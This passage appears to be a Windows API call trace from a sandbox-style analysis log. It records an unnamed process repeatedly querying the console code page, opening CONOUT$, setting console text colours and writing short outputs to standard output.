lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.485] GetLastError () returned 0xcb [0053.485] GetConsoleOutputCP () returned 0x1b5 [0053.485] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.485] GetLastError () returned 0xcb [0053.485] GetConsoleOutputCP () returned 0x1b5 [0053.485] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.485] GetLastError () returned 0xcb [0053.485] GetConsoleOutputCP () returned 0x1b5 [0053.485] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.485] GetLastError () returned 0xcb [0053.485] GetConsoleOutputCP () returned 0x1b5 [0053.485] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.485] GetLastError () returned 0xcb [0053.485] GetConsoleOutputCP () returned 0x1b5 [0053.485] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.485] GetLastError () returned 0xcb [0053.485] GetConsoleOutputCP () returned 0x1b5 [0053.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.486] GetLastError () returned 0xcb [0053.486] GetConsoleOutputCP () returned 0x1b5 [0053.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.486] GetLastError () returned 0xcb [0053.486] GetConsoleOutputCP () returned 0x1b5 [0053.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.486] GetLastError () returned 0xcb [0053.486] GetConsoleOutputCP () returned 0x1b5 [0053.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.486] GetLastError () returned 0xcb [0053.486] GetConsoleOutputCP () returned 0x1b5 [0053.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.486] GetLastError () returned 0xcb [0053.486] GetConsoleOutputCP () returned 0x1b5 [0053.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.486] GetLastError () returned 0xcb [0053.486] GetConsoleOutputCP () returned 0x1b5 [0053.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.486] GetLastError () returned 0xcb [0053.486] GetConsoleOutputCP () returned 0x1b5 [0053.487] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.487] GetLastError () returned 0xcb [0053.487] GetConsoleOutputCP () returned 0x1b5 [0053.487] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.487] GetLastError () returned 0xcb [0053.487] GetConsoleOutputCP () returned 0x1b5 [0053.487] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.487] GetLastError () returned 0xcb [0053.487] GetConsoleOutputCP () returned 0x1b5 [0053.487] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.487] GetLastError () returned 0xcb [0053.487] GetConsoleOutputCP () returned 0x1b5 [0053.487] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.487] GetLastError () returned 0xcb [0053.487] GetConsoleOutputCP () returned 0x1b5 [0053.487] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.487] GetLastError () returned 0xcb [0053.487] GetConsoleOutputCP () returned 0x1b5 [0053.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.488] GetLastError () returned 0xcb [0053.488] GetConsoleOutputCP () returned 0x1b5 [0053.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.488] GetLastError () returned 0xcb [0053.488] GetConsoleOutputCP () returned 0x1b5 [0053.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.488] GetLastError () returned 0xcb [0053.488] GetConsoleOutputCP () returned 0x1b5 [0053.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.488] GetLastError () returned 0xcb [0053.488] GetConsoleOutputCP () returned 0x1b5 [0053.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.488] GetLastError () returned 0xcb [0053.488] GetConsoleOutputCP () returned 0x1b5 [0053.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.488] GetLastError () returned 0xcb [0053.488] GetConsoleOutputCP () returned 0x1b5 [0053.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.488] GetLastError () returned 0xcb [0053.488] GetConsoleOutputCP () returned 0x1b5 [0053.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.489] GetLastError () returned 0xcb [0053.489] GetConsoleOutputCP () returned 0x1b5 [0053.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.489] GetLastError () returned 0xcb [0053.489] GetConsoleOutputCP () returned 0x1b5 [0053.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.489] GetLastError () returned 0xcb [0053.489] GetConsoleOutputCP () returned 0x1b5 [0053.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.489] GetLastError () returned 0xcb [0053.489] GetConsoleOutputCP () returned 0x1b5 [0053.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.489] GetLastError () returned 0xcb [0053.489] GetConsoleOutputCP () returned 0x1b5 [0053.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.490] GetLastError () returned 0xcb [0053.490] GetConsoleOutputCP () returned 0x1b5 [0053.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.490] GetLastError () returned 0xcb [0053.490] GetConsoleOutputCP () returned 0x1b5 [0053.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.490] GetLastError () returned 0xcb [0053.490] GetConsoleOutputCP () returned 0x1b5 [0053.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.490] GetLastError () returned 0xcb [0053.490] GetConsoleOutputCP () returned 0x1b5 [0053.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.490] GetLastError () returned 0xcb [0053.490] GetConsoleOutputCP () returned 0x1b5 [0053.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.490] GetLastError () returned 0xcb [0053.490] GetConsoleOutputCP () returned 0x1b5 [0053.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.490] GetLastError () returned 0xcb [0053.491] GetConsoleOutputCP () returned 0x1b5 [0053.491] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.491] GetLastError () returned 0xcb [0053.491] GetConsoleOutputCP () returned 0x1b5 [0053.491] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.491] GetLastError () returned 0xcb [0053.496] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0053.496] GetLastError () returned 0xcb [0053.496] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.496] GetLastError () returned 0xcb [0053.496] GetConsoleOutputCP () returned 0x1b5 [0053.496] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.496] GetLastError () returned 0xcb [0053.498] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0053.498] GetLastError () returned 0xcb [0053.499] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x5c8eb30 | out: lpMode=0x5c8eb30) returned 0 [0053.499] GetLastError () returned 0x6 [0053.502] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0053.503] GetLastError () returned 0x6 [0053.503] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.503] GetLastError () returned 0x6 [0053.506] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0053.506] GetLastError () returned 0x6 [0053.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.507] GetLastError () returned 0x6 [0053.510] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0053.510] GetLastError () returned 0x6 [0053.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.510] GetLastError () returned 0x6 [0053.512] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0053.513] GetLastError () returned 0x6 [0053.516] CloseHandle (hObject=0x23) returned 1 [0053.516] GetLastError () returned 0x6 [0053.519] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0053.519] GetLastError () returned 0x6 [0053.519] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.519] GetLastError () returned 0x6 [0053.520] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0053.520] GetLastError () returned 0x6 [0053.520] CloseHandle (hObject=0x23) returned 1 [0053.521] GetLastError () returned 0x6 [0053.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x360 [0053.521] GetLastError () returned 0x6 [0053.521] GetConsoleMode (in: hConsoleHandle=0x360, lpMode=0x5c8eac8 | out: lpMode=0x5c8eac8) returned 0 [0053.521] GetLastError () returned 0x6 [0053.521] GetConsoleOutputCP () returned 0x1b5 [0053.527] GetFileType (hFile=0x360) returned 0x3 [0053.529] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x4f, lpOverlapped=0x0) returned 1 [0053.530] GetLastError () returned 0x0 [0053.533] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0053.535] GetLastError () returned 0x0 [0053.535] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.535] GetLastError () returned 0x0 [0053.535] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0053.535] GetLastError () returned 0x0 [0053.536] CloseHandle (hObject=0x23) returned 1 [0053.536] GetLastError () returned 0x0 [0053.540] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0053.540] GetLastError () returned 0x0 [0053.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.540] GetLastError () returned 0x0 [0053.540] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0053.540] GetLastError () returned 0x0 [0053.540] CloseHandle (hObject=0x23) returned 1 [0053.541] GetLastError () returned 0x0 [0053.541] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.543] GetLastError () returned 0x0 [0053.547] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0053.547] GetLastError () returned 0x0 [0053.547] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.547] GetLastError () returned 0x0 [0053.547] GetConsoleOutputCP () returned 0x1b5 [0053.547] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.547] GetLastError () returned 0x0 [0053.550] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0053.551] GetLastError () returned 0x0 [0053.551] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.551] GetLastError () returned 0x0 [0053.554] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0053.554] GetLastError () returned 0x0 [0053.554] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.555] GetLastError () returned 0x0 [0053.558] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0053.558] GetLastError () returned 0x0 [0053.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.559] GetLastError () returned 0x0 [0053.559] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0053.559] GetLastError () returned 0x0 [0053.559] CloseHandle (hObject=0x2f) returned 1 [0053.559] GetLastError () returned 0x0 [0053.562] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0053.562] GetLastError () returned 0x0 [0053.563] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.563] GetLastError () returned 0x0 [0053.563] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0053.563] GetLastError () returned 0x0 [0053.563] CloseHandle (hObject=0x2f) returned 1 [0053.563] GetLastError () returned 0x0 [0053.563] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x4f, lpOverlapped=0x0) returned 1 [0053.564] GetLastError () returned 0x0 [0053.567] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0053.567] GetLastError () returned 0x0 [0053.567] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.567] GetLastError () returned 0x0 [0053.567] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0053.568] GetLastError () returned 0x0 [0053.568] CloseHandle (hObject=0x2f) returned 1 [0053.568] GetLastError () returned 0x0 [0053.571] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0053.571] GetLastError () returned 0x0 [0053.571] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.571] GetLastError () returned 0x0 [0053.571] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0053.572] GetLastError () returned 0x0 [0053.572] CloseHandle (hObject=0x2f) returned 1 [0053.572] GetLastError () returned 0x0 [0053.572] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.573] GetLastError () returned 0x0 [0053.576] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0053.576] GetLastError () returned 0x0 [0053.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.576] GetLastError () returned 0x0 [0053.576] GetConsoleOutputCP () returned 0x1b5 [0053.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.576] GetLastError () returned 0x0 [0053.579] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0053.580] GetLastError () returned 0x0 [0053.580] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.580] GetLastError () returned 0x0 [0053.583] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0053.583] GetLastError () returned 0x0 [0053.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.584] GetLastError () returned 0x0 [0053.587] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0053.587] GetLastError () returned 0x0 [0053.587] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.587] GetLastError () returned 0x0 [0053.587] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0053.587] GetLastError () returned 0x0 [0053.587] CloseHandle (hObject=0x3b) returned 1 [0053.588] GetLastError () returned 0x0 [0053.591] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0053.591] GetLastError () returned 0x0 [0053.591] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.591] GetLastError () returned 0x0 [0053.591] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0053.591] GetLastError () returned 0x0 [0053.591] CloseHandle (hObject=0x3b) returned 1 [0053.592] GetLastError () returned 0x0 [0053.592] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x3e, lpOverlapped=0x0) returned 1 [0053.592] GetLastError () returned 0x0 [0053.595] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0053.596] GetLastError () returned 0x0 [0053.596] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.596] GetLastError () returned 0x0 [0053.596] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0053.596] GetLastError () returned 0x0 [0053.596] CloseHandle (hObject=0x3b) returned 1 [0053.596] GetLastError () returned 0x0 [0053.599] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0053.600] GetLastError () returned 0x0 [0053.600] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.600] GetLastError () returned 0x0 [0053.600] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0053.600] GetLastError () returned 0x0 [0053.600] CloseHandle (hObject=0x3b) returned 1 [0053.600] GetLastError () returned 0x0 [0053.601] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.601] GetLastError () returned 0x0 [0053.604] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0053.604] GetLastError () returned 0x0 [0053.604] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.605] GetLastError () returned 0x0 [0053.605] GetConsoleOutputCP () returned 0x1b5 [0053.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.605] GetLastError () returned 0x0 [0053.608] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0053.608] GetLastError () returned 0x0 [0053.608] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.608] GetLastError () returned 0x0 [0053.611] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0053.612] GetLastError () returned 0x0 [0053.612] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.612] GetLastError () returned 0x0 